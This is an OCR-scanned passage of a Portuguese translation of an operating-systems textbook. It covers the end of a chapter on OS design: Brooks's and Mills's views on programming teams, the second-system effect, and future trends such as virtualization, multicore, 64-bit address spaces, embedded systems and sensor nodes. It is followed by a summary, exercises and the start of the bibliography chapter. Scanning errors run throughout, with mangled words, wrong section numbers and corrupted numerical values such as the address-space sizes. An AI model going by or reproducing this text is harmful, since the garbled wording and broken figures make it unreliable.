Tres decadas se passa ram desde que isso foi pi opos l o 
e colocado em pratica. Algumas coisas tnudaram (como a 
neccssidade de um advogado de Unguagens — Ce mais 
simples do que PL/1), mas a neccssidade de se ter somen- 
te urna rnente controlando o projeto ainda e valtda. Essa 
menie deve ser ca pa z de trabalhar 100 por cent o no pro¬ 
jeto e na programaęao; dai a neccssidade dc um grupo de 
suporte, embora, com a ajuda dc um computador, um pe- 
queno grupo seria sufideme boje em dia. Mas, na essenda, 
a ideia ainda fundona. 

Qualquer projeto grandę precisa ser organizado de 
maneira bierarquica. No mais baixo nfvel existem muitas 
eąuipes peąuenas, cada qtial li de rada por um programador- 
-ehefe. No mvel seguinte, grupos de eqmpes devem ser co- 
ordenados por um gerente. A expcrienda mostra que cada 
pessoa que vocc gerenda Ihe custa 10 por cento de seu tem¬ 
po, dc modo quc um gerente cm tempo integral e nceessa- 
rio para cada grupo de dez equipes, Esses gerentes devem 
ser gerenciados e assim segue. 

Brooks observou que as mas notfcias nao se movem 
bem para o topo da arvorc. Jerry Saltzer, do MIT, cha mon 
esse efcito de diodo mas notfcias. Nenhum programador- 
-chefc ou gerente quer dizer a scu chefe que o projeto esta 
quatro meses atrasado c quc nao ha a menor possibiltdade 
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Trtulo 

Obrigacdes 

Programador-chefe 

Execula o projeto arquiteturai e escreve o código 

Copibto 

Aj u da o programador-chefe e serve como um porto seguro 

Administrador 

Gerencia pessoas, oręamento, espaęo, equrpamentos> relatórios etc. 

Editor 

Edita a docunnentaęao, que deve ser escrita pelo programador-chefe 

Secretarias 

Secretarias para o administrador e o editor 

Secretario da programas 

Mantóm os arquivos de código e docuinentaęao 

Ferramenteiro 

Fornece qualquer ferramenta de que o programador-chefe precise 

Testador 

Testa o código do programador-chefe 

Adwgado de ling u ag en s 

Professional de tempo parciał que pode assessorar o programador-chefe em relaęao a linguagem 


i Tabela 13,2 Proposta de Mills para montar urna equipe de programadores-chefe de dez pessoas. 


de cumprir o prazo combinado, pois cxisle u ma vdha tra- 
dięao, de mais de dois mil anos, na qual o inensageiro e 
degolado ąuando iraz mas notlcias. Conseąuentememe, o 
gerenciamenio superior muitas vezes fi ca no escuro com 
relaęao ao cstado rcal do projeto. Quando se terna óbvio 
quc o prazo nao pode ser cumprido, o gcrenciamento su¬ 
perior reage adicionando pessoas, rnomciito no qual a lei 
de Brooks espemeia. 

Na pratica, as grandcs empresas — que tern lido urna 
longa expcrićnda na produęao de software e sabem o quc 
ocorre se ele e produzido casualmente — tern urna tenden¬ 
cja a pele menos lentar faze-lo direito, Hm contraste, em¬ 
presas peąuenas e novatas, exiremameme a pressa d as em 
ganhar o mercado, nem sempre tomam precauęoes para 
produzir sens softwares com cuidado, Essa pressa muitas 
vezes afasta os resultados ótimos. 

Nem Brooks nem Mills previram que cresceria o mo- 
vimento em prol do código aberto. Embora este tenha tido 
alguns sucessos, resta saber se ele permanecera um modelo 
viavel para a produęao de grandes qiiantidades de software 
de ąualidade ąuando nao for mais novidade, 0 notavel e 
quc os projetos dc software dc código aberto mais bem- 
-succdidos tern usado o modelo de progra ma do r-chcfc com 
urna menie controlando o projeto arquitclural (por exem- 
plo, Limis Torvalds para o nudeo do Linux e Richard Stall- 
man para o compilador GNU C), 

13.5.51 O papel da experiencia 

Ter projetistas experientes e funda niemal para o proje¬ 
to de um sistema operacional. Brooks aponta que a maioria 
dos erros nao ćśta no código, mas no projeto, Os programa¬ 
do res fa zeru corrctamcntc aąuilo que clcs foram ordenados 
a fazer. Mas aąuilo que llies mandaram fazer estava errado. 
Ncnhuma ąuamidade dc tesles de software vai dcieciar as 
mas especifkaęoes. 


A soluęao dc Brooks visa a abandonar o modelo de de- 
senvolvimento classico da Figura 13,9{a) e usar o modelo 
da Figura 13.9(b). Nessc caso, a ideia e primeiro escrever 
um progra ma prindpa! que simplesmcme chama os pro- 
cediinentos do nfvel superior — os quais sao inicialmen¬ 
ie apenas rotlnas vazias (dummm). Ja no primeiro dia do 
projeto, o sistema pode ser compilado e executado, embo¬ 
ra atnda nao faęa nada. A medida que o tempo passa, os 
módulos sao hiseridos para a criaęao do sistema compleio. 
O resullado disso e que o tesle de inlegraęao do sistema c 
rcalizado continua meme, dc modo quc os erros no proje¬ 
to aparcccm muiio mais codo. C on sequ cnie menie, perce- 
bern-se as mas dedsócs dc projeto rnuito antes no ciclo, 

Polico conhecimenio e algo perigoso. Brooks observou 
aąuilo que ele charnou dc efeito do segundo sistema. 
Muitas vezes o primeiro produio de urna eąuipe de projeto 
c peąueno, pois os projetistas estao receosos ąuanlo a seu 
funcionainenlo correto, Em conseąuencia, clcs hesitam em 
co 1 ocai mu i las caractcnslicas. Sc o projeto e bem-succdido, 
clcs constrocm a continuami o do sistema, Impressionados 
com o próprio sucesso, na segunda vez os projetistas in- 
eluem todas as caractcristicas avaoęadas c exageradas que 
foram i mend onalmen te deixadas de lado da primeira vez- 
Resullado: o segundo sistema fica tnflado e o desempenho, 
ruim. Na terceira vez, cles estao escaldados pela lalha do 
segundo sistema c voltani a ser cautelosos. 

A dupla CTSS-MULTIGS e um exemplo bem apropria- 
do, O CTSS foi o primeiro sistema de tempo compariilhado 
dc propósito gcral c um grandę sucesso mesrno tendo u ma 
minima fundo na lidade. Seu su cc ss ot; o MULT1CS, foi tao 
a mb i ci oso que sofreu as conseąuencias, As ideias eram 
boas, mas havia ta mas coisas novas quc o sistema traba- 
Ihou precariameme du ranie a nos e nunca foi um grandę 
exito comerdal. O terceiro sistema nessa lin ha de desen- 
volvimento, o UNJX, foi muiio mais cauteloso e de rnuito 
maior succsso. 
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(a) (b) 


Figura 13,9 {a) Projeto tradiciona! de software progride em estagios. (b) Projeto alłernalivo produz um sistema que funciona (mas 
I nao faz nada) ja no dia 1. 


15.5.41 Nao ha bała de prata 

Alan de The my (hieni men month, Brooks tambem es- 
creveu um artigo jnuito influcnie cha mado "San soluęocs 
geniais" ("No silvcr bu Ller, Brooks, 1987). Nesse artigo, de 
argunientou qne nenliuma das mtiitas soluęocs promelidas 
por diversos fabricantcs seria capa z dc ofercccr a mcihora dc 
u ma ordcm dc magnUude na produtmdade de software den- 
tro dc unia decada, A expcricncia mostra que de estava certo. 

Entre as soluęóes geniais propostas estao as linguagens 
dc alto nivcL a programaęao oricmada a obje los, a tntc- 
ligenda artificiaL os sistemas espcda)isias H a programaęao 
a ulom a lica, a programaęao gra fi ca, a verificaęao de pro- 
gramas c os ambienies dc programaęao. Talvez na prósrima 
decada vcjamos urna soluęao gcnial, mas ta bez Leohamos 
de nos comeruar com. nielhoras graduals, incrcmemais. 


13.6 


Tendencias no projeto de 
sistemas operacionais 


Fazer predięóes e sempre dificiL Por cxemplo, em 
1899, o lider do Departament o de Patem es dos Estados 
Unidos, Charles H. Duell, aconsdlioii o en tao presidentc 
McKinlcy a abolir o Escritório de Patcntcs (e com isso sen 
emprego!}, pois, como de havia afirmado; "Tudo o que po¬ 
dia ser invemadoja fol irwemado* (Cerf e Navasky, i 984). 
Todavia, Thomas Edison apareceu em sua porta deniro dc 
poucos anos com um eon junto de novos ilens, i udusi ve a 
luz eletrica, o fonografu e o projetor de filmes. Vamos agora 
colocar baterias novas em nossa bola de cristal e arriscar 
urna admnhaęao sobre ate onde os sistemas operacionais 
chegarao no futuro próximo. 


13.6.11 Virtuafizaęao 

A vinua)izaęao tsia na moda mais urna vez. Ela surgiu 
pela primeira vez em 1967, com o sistema IBM CP/CMS, 
e esta de volia com foręa total na plataforma Pemiiun. Em 
um fu turo bem próximo, muiios coniputadores terao hi- 


pemsores funciona udo na maquina pura, conforme i lustra 
a Figura 13,10; o hipervisor criara um mi mero dc maąumas 
virtuais c cada u ma tera seu próprio sistema operadonal 
Alguns computadores terao urna maąuina virlual na qual 
o Windows funciona para as aplicaęoes legadas, diversas 
ma qu i nas virtuais com Lmux para as aplicaęoes correntes 
e, Lalvez, um ou mais sistemas operacionais experimentai$ 
cm outras maquinas vinuais. Esse fenomena foi discutido 
no Capftulo 8ee ( definitivameiite, a tendencia do futuro. 

_ 13,6.21 Processadores multmudeo 

Os processadores muliinudeo ja sao urna realidade, 
mas os sistemas operacionais para des nao fazem uso total 
de sua capaddade nem com dois nucleos, imagine com 64, 
que e o que se espera para breve. O quc Lodos os niickos 
farao? Que lipo de software eles vao demandar? No mo- 
inctno, rcalmeme nao sabemos. Em principia, as pessoas 
lenlarao fazer com que os sistemas operacionais atu ais fun¬ 
do nem ndes, mas e posshel quc essa empreitada nao seja 
bcm-sucedida com numeros altos de nucleos por conta do 
problcma do bloqueio de tabdas c oulros rccursos dc soft¬ 
ware. Existc muilo espaęo para ideias radicais nessa area. 

A combinaęao de virLualizaęao com os processado- 
res multinucko cria um ambienie lotalmentc novo. Nes¬ 
se mundo, o nu mero dc CPUs disponneis e program a vel. 
Com um processador com oito ntideos, o software conse- 
gue fazer qualquer coisa — desde utilizar unia CPU somente 


M^quina virtual ^ 

Windows 

Linux 

Linux 

Outro 
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Hfpervisor 


Hardware 


I Figura 13*10 Um hipervisor executando quatro maquinas 
virtuais. 
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e ignorar as outras sete, ate usar todas as otio, on realizar 
urna virmaiizaęao dupla {que criaria 16 CPUs yirtuais), 
quadrupla (com 32 CPUs yirtuais) ou qualquer outra com¬ 
bi na ęao. Um program a pode comeęar ammriando ąuantas 
CPUs dcscja c o sistema operaci ona I seria responsavel por 
fazę-las aparecer. 

13-6-3 I Sistemas operacionais com grandes 
espacos de endereęamento 

Com a mudanęa nos espaęos de endereęamento das 
maąuinas de 32 para 64 bits, alteraęoes mais signiEcaiivas 
no projeto de sistemas operadojnais Lomam-se possńeis. 
Um espaęo de endereęamento de 32 bits nao e realmente 
grandę. Se voce tentar dmdir 2^ bytes, dando a cada um 
do planeta sen próprio byle, nao exi$tirao bytes sufideiites, 
Em contrasie, 2^e algo cm iorno de 2 x 10k Ncsse caso, 
cada um conseguiria seu bloco pessoal de 3 GB, 

O puc poderiamos fazer com um cspaęo de cudcrcęa- 
mento de 2 x IOdbyłeś? Para comeęar, eliminar o conceito 
de sistemas dc arqmvos: lodos os arquivos poderiam eon cci - 
lualmente estar contidos na memória (yirtual) ao mesmo 
tempo. Afinal, existe espaęo sufideme la para mais de um 
bil li a o de fil mes completos, cada qual comprimido a 4 GB. 

Outro uso possfvcl c o armazenamento pennanente 
de objetos, que poderiam ser criados no espaęo de ende¬ 
reęamento e mamidos nele ate que todas as referendas 
liyessem sido esgoiadas; nesse moment o, eles seria m auto- 
maiicamente rcmovidos. Esses objetos seriam marukios no 
espaęo de endereęamento, mesmo nas situaęóes de desliga- 
mento ou reinidalizaęao do computador. Com um cspaęo 
dc endereęamento dc 64 bits, os objetos poderiam ser cria¬ 
dos a unia taxa dc ] 00 MB/s duramc dneo mil anos am.es 
que se esgotasse a memória. Obviamente, para arma zen ai¬ 
de Tato essa ąuantidade de dados, seria necessario muito 
armazenamento de disco para o trafego de paginas, mas, 
pda primcira vez na historia, o fator Limitantc seria o ar¬ 
mazenamento em disco, e nao o cspaęo de endereęamento. 

Com grandes quantidade$ de objetos no espaęo de en- 
dcreęamemo, passa a ser interessanle permiiir quc multi- 
plos processos executem no mesmo espaęo de endereęa¬ 
mento ao mesmo tempo, a firn de compartilhar os objetos 
de u ma maneira mais geral Esse projeto lcvaria, e ciaro, a 
sistemas operacionais muito diferentes dos que temos ago¬ 
ra. Algumas observaęoes sobre esses conceitos apareccm 
em Chase et al. (1994), 

Com endereęos de 64 bits, urna outra questao sobre 
os sistemas operacionais quc tera de ser repensada e a me- 
mória virtual Com 2 111 bytes de espaęo de endereęamento 
yirtual c paginas dc 8 KB, temos 2 ł] paginas. As tabelas de 
paginas coiwencionais nao cscalam bem para esse tanta¬ 
li ho, dc modo quc sc faz necessario outro csąucma. As ta¬ 
belas de paginas invertidas sao urna possibilidade, mas ou- 
tras ideias tern sido propostas (Talluri et al., 1993). Em todo 


caso, existe muito espaęo para novas pesquisas em sistemas 
operacionais de 64 bits. 

USA I Em rede 

Os sistemas operacionais a mais foram p roje ta dos para 
computadores isolados. O uso de redes e algo receme c 
que, em geral, ocorre por meio de programas espectais, 
como navegadores da Web, PIP ou telnet. No futuro, o uso 
de redes provavelmente sera a base para todos os sistemas 
operacionais. Um computador isolado sem urna concxao 
dc rede sera tao raro quanto um telćfonc sem u ma conc- 
xao com a rede de telefonia* Alias, o normaI sera o uso de 
concKoes a mullimegabits/s. 

Os sistemas operacionais terao de se adaptar a esse 
paradigma. A difercnęa entre dados locais c rcmotos pode 
ser nebulosa a ponto dc praticamentc ninguem ter conhe- 
cimcnto ou se prcocupar cm saber oude os dados estao 
armazenados. Computadores em qualquer kigar podem 
tratar dados de qualqucr lugar como sc fossem dados lo- 
cais. Com certa li mi la ęao, isso ja e vcrdadc para o NFS, mas 
provavdmenie passara a ser algo muito mais uimcrsat e 
mais bem integrado* 

O acesso a Web, quc atualmente rcqucr programas 
espedais (navegadores), lambem pode toniąr-se comple- 
tamenie integrado dentro do sistema operacional, de ma¬ 
neira natura! e transparente* o pa dra o para armazenar a 
informaęao pod era ser a pagina da Web e essas paginas po¬ 
dem comer urna ampla variedade de itens que nao sejam 
texto, incluindo audio, video, programas etc., todos geren- 
ciados como dados fundamentais do sistema operacional 

13.6.51 Sistemas parafelos e distribuidos 

Outra area em alta e bem-sucedida e a dos sistemas pa¬ 
raleki e distribuidos* Os sistemas operacionais atuais para 
multiprocessadores e muliicomputadores simplesmente 
sao sistemas operacionais pa dra o para monoproeessadores 
com alguns ajustes para que o escalonador tratę o parate- 
lismo um pouco melhor. No futuro, poderemos ter sistemas 
operacionais em que o paralelismo seja muito mais central 
do que e agora. Esse eleito sera em grandę parte estimulado 
se os computadores pessoais em breve tiverem dois, quatro 
ou mais CPUs em urna coufiguraęao dc muhiprocessador* 
isso pode levar ao projeto dc muitos aplicativos para mul- 
tiprocessadores, com urna demanda simultanea para a me¬ 
lbom dosuportc do sistema operacional para eles. 

Nos prÓKimos anos, os muliicomputadores provavel- 
mente dominarao os supercomputadores nas engenharias 
e em areas dentificas de grandę escala, mas os sistemas 
operacionais para eles ainda sao basta nie primitivos t Alo- 
caęao de processos, balanceamento de targa e comunicaęao 
necessitam de muito trabalho. 

Os sistemas distribuidos atuais niuitas vezes sao cons- 
truidos como um middkware (camada intermediaria), pois 
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os sistemas operacionais existemes nao foniecem os recur- 
sos adeąuados para as aplicaęoes distribufdas. No futuro, 
eles poderao ser projetados com a nientalidade dos sistemas 
distribiudos c, assim r todas as caracterislicas necessarias ja 
cstarao presentes nos sistemas operacionais desde o inicio. 

13-6.61 Multimidia 

Os sistemas multimidia sao tlili da menie urna estrela 
em ascensao 110 munda dos computadores. Nao sera sur- 
presa para ninguem se compmadores, aparelhos de som, 
tdevisorcs c idefoncs forem combiiiados cm urn unia) 
dispositivo capa z de dar suportc a imagens, audio c v id co 
de alta ąualidade, e conectado a unia rede de grandę vdo- 
cidadc, de modo que esses arquivos possam ser fadlmcnte 
transferidos, trocados e acessados rcmoianieme* Os sistc- 
mas operacionais para esses dispositwos, ou mestno para 
dispositivos de audio e video isolados, tera o de ser subs¬ 
tancja 1 me me diferemes dos atuais. Hm particular, garantias 
de tempo real sera o necessarias, as quais devcrao oriemar 
o projeto do sisterna. Alem disso, os consumidorcs serio 
pouco lolerantes a ąuebras frequentes de seus televiso- 
res digitais, de modo que melhor ąualidade do software 
c maior tolerancia a falhas serio reąuisilos fu uda men Lais. 
Mais ainda, arquivos multimidia lendem a ser muito gran- 
des, obrigando os sistemas de arquivos a se adaptar para 
trata-I os c (lei c n tern cni e * 

13.6.71 Computadores movidos a bateria 

Scm duvida, poderosos PCs de mesa, provavchncntc 
com cspaęos dc endercęamcnto de 64 bits, rędes dc alta ca- 
pacidadc dc transnlissao, nniltiplos processadores c audio c 
video de alta ąualidade, serio comuns cm breve* Seus sis¬ 
temas operacionais terao de ser substantialmeme diferen¬ 
tes dos atuais para tratar loda essa demanda. Co mu do, urn 
segmento que esta crescendo ainda mais rapidamente no 
mercado e o de computadores movidos a bateria, incluindo 
notebooks, palmtops, Webpads, notebooks de cem dolares 
e smartphones. Aiguns deles terao conex5es sem fio para o 
mundo extcrno; outros executarao em modo desconectado 
ąuando nao cslWcrcm cm casn* Eles predsarao dc sistemas 
operacionais diferentes, menores, mais rapidos, mais flexf- 
vds c confiavds do quc os atuais* Varios tipos dc micronu- 
cleo c sistemas exlenstvds podem format a base nesse caso. 

Esses sistemas operacionais terao de tratar dispositivos 
totalmente conectados (isto e, com fio), fracamente co- 
nectados (isto e, sem fio) e des eon cci a dos — incluindo os 
da dos acumulados durantc o periodo dc desligamento c a 
resoluęao dc consistcncia ąuando rcligados — melhor do 
que os sistemas atuais. O mesmo valc para os probkmas dc 
mobil idade (por exemplo, localizar uma impressora a laser, 
coneciar-se a da e t nviar um arquivo via ondas de radio)* O 
gerendamento de energia sera essencial, incluindo dialogos 
exiensivos entre o sisterna opera ci ona l e as aplicaęoes sobre 
a ąuantidade de energia da bateria que e perdida e como ela 
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pode ser mais bem usada. A adaptaęao dinamica das apli¬ 
caęoes para tratar as limiiaęocs dc peąuenas idas dc vfdco 
pode vir a ser algo importante. Por firn, novos rnodos de en- 
trada e safda, incluindo escrita a mao e fala, podem precisar 
de novastecnicas nos sistemas operacionais para melhorar a 
ąualidade. E improvavel que o sisterna operarionał para um 
computador portatil, movido a bateria, sem fio e operado 
por voz venha a ter muito em eon mm com o de um mul- 
tiprocessador dc mesa com quatro CPUs de 64 bits e uma 
conexao de rede de fibra ótica com taxa de transmissao na 
ordcm dc gigabits. E, obviamcntc, existirao in u mc ras ma- 
ąuinas liibridas com suas próprias necessidades. 

13.6.81 Sistemas embarcados 

Uma area finał na qual novos sistemas operacionais 
vao proliferar e a de sistemas embarcados (embedded Sys¬ 
tems). Os sistemas operacionais dermo dc lavadoras, for- 
nos de micro-ondas, bonccas, radios transistores (de Inter¬ 
net?), reprodutores de MP3, cameras de vfdeo, elevadores 
e marca-passos sera o diferentes de todos os citados anie- 
riormeme e e bem provavel que tambem sejam diferentes 
uns dos outros. Ca da um sera projetado com cuidado para 
suas aplicaęoes espedficas, visto que e improvaveI que al- 
guem va concciar um ca nao PCI em um marca-passo para 
transfomia-Io cm um controlador dc ckvador* Vislo que 
todos os sistemas embarcados executam somenie um mi¬ 
mem limitado de programas, conhecidos no memento de 
projeto, sera posswel la zer otimiżaęoes boje impcnsavds 
nos sistemas de propósito geral. 

Uma Ideia promissora para os sistemas embarcados e a 
de sistemas operacionais extensfveis (por exemplo. Paranie- 
cium e Exokernd), que podem ser feilos tao Ieves ou pesa- 
dos quanto a apllcaęao em questao exigir, porem consisien- 
les quanto as aplicaęoes. Visio quc os sistemas embarcados 
scrao produzidos as cenienas dc milhocs, esse sera um mer¬ 
cado funda men lal para novos sistemas operacionais. 

13.6.91 nó sensor 

Embora seja um niebo de rncrcado, as redes dc senso- 
res estao sendo disponibilizadas em muitos contextos, des¬ 
de o monitoramento dc edificios e fronieiras, ate a detecęao 
de incendios florestais e muitos outros. Os sensores utili- 
żados sao bar a tos e a sam pouca energia, alem de rcque te¬ 
rem sistemas operacionais c]ixutos quc tem muito pouco 
alem das bibliotecas em tempo de execuęao. Ainda assim, 
a medida que os nos fi ca tu maisbaratos, comeęamos a ver 
neles sistemas operacionais reais, mas, e claro, otimizados 
para suas tarefas e eon su min do a menor ąuantidade possf- 
vd dc energia* Com o tempo de vida das baterias medido 
em meses e os transmissores c rcccptorcs dc redes sem fio 
funcionarido como grandes consumidores de energia, esses 
sistemas scrao organizados dc forma a utilizarem energia 
da maneira mais eficiente posswel. 
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Resumo 


O projeto de um sistema operacional tein iiitcio com 
3 determinaęao daąuilo que ele deve fazer. Ć desejavel 
que a interface seja simples, completa e eflciente. Devem 
exisiir paradigmas nitki os da interface do usuario, da exe- 
cuęao e dos dados. 

O sistema prerisa ser hem cstruuirado, usando urna 
das varias tćenicas conhcridas, como estruluraęao cm ca- 
madas ou dicntc-scnddor. Os componentes i mer nos pre- 
cisam ser ort ogona is uns aos outros c separar da ranienie a 
polflica do mecanismo. Unia analise adeąuada tern de ser 
feita para questoes como esirmuras de dados estalicas ver- 
sus dinamieas, nomeaęao, i nomen to de assodaęao e ordem 
de implejnemaęao dos módnlos. 

O desempenho e importante, mas as otimizaęoes de- 
vem ser escolliidas cuidadosa menie para nao ar rui nar a 
estrutura do sistema. Muitas vezes e bom que sejam feitas 
ponderaęoes sobre espaęo-tempo, uso de caches, dicas, ex- 
ploraęao de localidade e otimizaęao do caso comum. 

Escrever um sistema com urna dupla de pessoas e di* 
ferente de produzir um grandę sistema com 300 pessoas. 
No segundo caso, a estrutura da equipe e o gerenriamento 
do projeto impóem um papci crucial ao sucesso ou fracas- 
so do projeto. 

Por firn, os sistemas operacionais terao de ser modifi- 
cados nos próximos a noś para seguir novas ten den ci as e 
a tender a novos desafios, que pudem incluir sistemas ba- 
seados cm hipervisores, sistemas mulrtnucleo, espaęos dc 
cndcrcęamcnio dc 64 bils, concctmdade rnacięa, multipro- 
cessadores e multicomputadores dc grandę escata, mu l ii- 
uudia, computadores portateis sem Ho, sistemas embarca- 
dos c nos sensores* Os próximos a nos serio bem animados 
para os projetistas dc sistemas operadonais. 


Problemas 


1. A lei de Moore descreve um fenomeno de cresdmento 
exponcncial similar ao cresciniemo populacional de mna 
especie animal introduzida em um novo ambientc com 
comida abundante e nenhum mimigo natural. Na natu- 
rcza, urna eurva de crescimemo esponendal tero proba- 
bi lida de de, ao finał tornar-se lima eurva sigmoide com 
um limite assintótfco quando o suprimento de comida 
se tornar limitanie ou os predadores aprenderem a tirar 
va nia gem da nova presa. Discuta alguns faiores ca pa ze s 
de li mi tar a iaxa dc melhoras do hardware do com pum* 
dor. 

Na Figura 13,1, dois paradigmas sao mostrados: orienta- 
dos a algoritnios e a evemos. Para ca da um dos seguimes 
Lipos de programas, qual paradigma provavelmeme e o 
mais facil de usar? 

(a) Um compilador. 
w Um programa de edięao de imagem. 

(c) Um programa dc folha dc pagamenlo. 

3, Em alg uns dos primeiros Macintosh da Apple, o cod i go da 
GUI iicava na ROM. Por que? 


4. A teoria dc Corbató diz quc o sistema devcria fornecer 
u ni mecanismo minimo. His urna lista de chamadas do 
POSIX que tambem estavam presemes na versao 7 
do UNIX. Quais sao redundantes, Islo e, quais poderiam 
ser removidas sem perda dc funcionalidade porque com- 
binaęocs simples de outras chamadas seriam capazes dc 
fazer o mesmo trabaiho com desempenho equivaletitc? 
Access, alarm, chdir, chmod, chown, chroot, close, creat, 
dup, exec, exit r fcntL lork, fetat, iocti, kil I, link. Iseek, mkdir, 
mknod, open, pause, pipę, read, stal, time, times, umask, 
unlink, utime, wait e write. 

5. Em um sistema cliente-servidor baseado em micronudeo, 
esic simplesmente reaiiza a troca dc mensagens e nada 
mais. Apesar disso, e possivd aos processos do usuario 
criarem c usarein semciforos? Em caso afirmatico, como? 
Caso contra rio, por que nao? 

6. Otimizaęoes cuidadosas podem mdhorar o desempenho 
das chamadas de sistema. Considere o caso no qual urna 
chamada dc sistema seja feita a cada 10 ms. O tempo mc- 
dio de urna chamada e de 2 ms. Se as chamadas de sistema 
podem ser aceleradas por um lator de dois, quamo tempo 
um processo que Ievava 3 0 s para ex ecu tar leva agora? 

7. Apresente uma breve discussao do mecanismo emws po- 
litica no contexto de uma łoją de vendas ao varejo. 

8. Os sistemas operadonais muitas vezes fazem nomeaęao 
em dois nfveis diferentes: externo e interno. Quais sao as 
diferenęas entre esses nomes com relaęao a: 

(a) Tamanho. 

(b) Uniddadc. 

(c) Hierarąuia, 

9. Urna maneira dc tratar rabelas cujos lamanhos nao sao 
conhcddos antecipadamente e fazo-las dc tamanhos fi- 
xos, mas, ąuando alguma estiver cheia, para subslitui- 
-la por uma maior, copiar as emradas antigas para a nova 
e, depois, liberar a antiga. Quais as vantagens e as desvan- 
tagens dc fazer uma nova tabela 2x o tamanho da tabela 
odginał, com pa rado com fazę-la somente l,5x? 

10. Na Figura 13.5, uma variavcl dc aviso, encontrado, c cm- 
pregada para dizer se o PID foi localizado. Seria possivd 
desconsiderar encontrado c simplesmente testar p no finał 
do laęo, verificando se dc atinge ou nao o finał? 

11. Na Figura 13.6, as diferenęas entre o Pentium e o Ultra¬ 
SPARC sao cscondidas pela compilaęao condicionaL 
Poderia essa mesma pratica ser usada para esconder as 
diferenęas entre Pemiums com um uiiico disco IDE e Pen- 
tiurns com um tinico disco SCSI? Seria uma boa ideia? 

12. A indireęao e uma maneira dc tornar um algoritmo mais 
flexfvel. Existem desvantagens nesse metodo? Ern caso 
afirmativo, quais? 

13. Os procedimentos reenirantes podem ier variaveis globais 
esiaiicas? Justifique sua resposia. 

14. A macro da Figura I3,7(b) e nitidamemc mais dicienie 
do que o procedimemo da Figura 13J(a>, Contudo, ha 
uma desvamagcm: edc diffcil Icitura, Existem outrasdes- 
yantagens? Em caso afirmalivo, quais sao das? 
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15. Suponha quc predsemos tle um modo para calcuiar sc 
o numero de bits em urna palavra de 32 bits € par ou 
fmpar. Faęa um algoritmo para execmaressa compmaęao 
tao rapido quanu> possfael Voce pode usaratc 256 KB de 
RAM para ta be] as se nccessario for Escreva unia macro 
para realizar seu algoritmo. Crerfite extra: escreva um pro- 
cedimento para fazer a tomputaęao por ineio de um 3aęo 
sobre os 32 bits. Cale ule q u auto tempo sua macro e mais 
rapida do quc a rotina. 

16. Na Figura 13.8, vemos como arquivos GIF usam valores 
de 8 bks para iudesar u ma paleta colorida. A mesma ideia 
pode ser empregada em urna paleta colorida de i6 bits 
dc largura. Sobąuaisdrcunslandas urna paleta colorida de 
24 bits pode ser urna boa ideia? 

17. Uma desvantagem do GIF e que a imagom tom do inclmr 
a paleta colorida, que amnema o lamanho do arqulvo. 
Qual e o tamanho mfnimo de imagom para a qual uma 
paleta colorida de 8 bits do largura nao a pro sen ta vanta- 
gem? Agora repiia a operaęao para uma paleta colorida de 
16 bits de largura, 

18. No 10X10, discuLimos como o uso de cadie para os nomes 
dc caminhos pode rcsultarcm um aimicnto considcravel 
no desempenho durante a procura de nomes de cami- 
nhos, Utną ouira tecnica as vezes ad ot a da consiste em ter 
um programa scrvidor {daemon) que abre os arquivos no 
diretório-raiz, ma mendo-os abertos, permanentemente, 
para forgar sens i-nodes a licarem na memória durante 
lodo o tempo. A fkaęao dos bnodes — como essa — me- 
Ibora ainda mais a procura do caminho? 

19. Mcsmo que um arquivo remoto nao ten ha sido removido 
desdo quc uma dica (oi registrada, cle pode ter sido mo- 
dificado desde a ultima vez ein que foi referendado. Que 
outra informaęao pode ser u lii rcgistrar nele? 

20. Considcrc um sistema quc acumula referendas a arquivos 
remotos como dicas, por exemplo, do lipo (nonie, hospe- 
deiro remoto, nonie remoto). Ć poss(vel que um arquivo 
remoto seja nenuwido silenciosameme e depois substittn- 
do. A dica pode, entao, retornar o arquivo errado, Como 
osse problema pode ocorrer de manoira me nos provavel? 

21. No texto, afirma-se quo a localidado mu i ta s vezes pode 
ser explorada para melhorar o desempenho, Mas consi- 
dere um caso em que um programa le a entrada de um 
arquivo-fontc e continuamcntc coloca a safda em dois ou 
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mais arquivos, Uma tcntativa dc tirar vamagcm da loca- 
lidade no sistema de arquivos pode levar h reduęao da 
eficiencia nesse caso? Existe algum modo de eontornar 
isso? 

22. Fred Brooks a firm a que um programador c capaz de es- 
crever mil linhas de código depurado por ano, ainda que a 
primcira vcrsao do MIN IX (13 mil linhas de código) ten ha 
sido produzida por uma pessoa em menos de tres anos. 
Como voce cxplica cssa discrepanda? 

23. Usando a ideia de Brooks — mil linhas de código por pro¬ 
gramador ao ano — faęa urna estimaiiva da ąuantidade 
de dinhdro gasto para produzir o Windows Vista, Presu- 
ma que um programador eusle cem mil dólares por ano 
( indu i nd o cttslos associados, como compuladores, espaęo 
de laboratório, supone de secretaria e gerendamemo), 
Voce considera plausivel esse valor a que voce chegou? 
Em caso negativo, o que porieria estar errado? 

24. Como a meniória esta ficando ca da vcz inais baraia, al- 
gitem poderia pensarem um computadorcom uma gran¬ 
dę RAM mant Ida com bateria em vez dc um disco rfgido, 
Em prcęos atuais, qual seria o custo dc um PC simples 
com base somente em RAM? Presuma quc um disco de 
RAM dc 1 GB seja sufkiente para uma maquma slmples, 
Existe a probabiiidade de essa maquina ser competitiva? 

25. Cite algumas ca ra et erfst i ca s de um sistema operacional 
eon vc nci on a 3 quc nao sao necessarias e]it um sistema 
embarcado usado dentro de um eleirodomestlco. 

26. Escreva um procedimemo em C para fazer uma adięao 
com dupla prędsi o sobre dois parametros da dos, Escrevn 
o procedimemo usando compilaęao condicional, de modo 
que fundone em maquinas de 16 bits e lambem em ma- 
ąuinas de 32 bits, 

27. Esereva versoes de um programa que insira pequenas 
cadeias de caracteres geradas ałeatoriamente em mu ve- 
tor c quc permita depois a procura dc uma dada cadcia 
dentro desse vetor considerando (a) uma pesquisa linear 
sini pies (foręa brutaj e (b) um metodo mais sofisticado de 
sua escolha. Recompile seus program as para tamanhos dc 
vetores variando de pequeno ale o maior tamanho que 
voce possa tratar em seu sistema, Avalie o desempenho 
de todas as abordagens. Onde esta o ponto de equilibrio? 

28. Escreva um programa para sini u lar um sistema de arqui- 
vos em memória. 
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Capitulo 



Sugestóes de leitura e 

bibliografia 


Nos 13 capim los anteriores abordamos urna varieda- 
de de tópicos, Hste c destinado a aj udar o leilor interes- 
sado em aprofundar seus esiudos de sistemas opera donais. 
A Seęao 14 A apresenta unia lisia de sugestóes de leitura. A Se¬ 
ęao 14.2 traz urna bibliografia, ordenada alfabet i camente, 
de todos os livros e artigos citados neste livro. 

Alćm das refcrendas dadas a scgu ir, o ACM Sympo¬ 
zjum on Operat iiuj Systems Prindpks (50SP), organ i za do 
nos anos fmpares, e o U SEN IX Sympozjum on Opzrating 
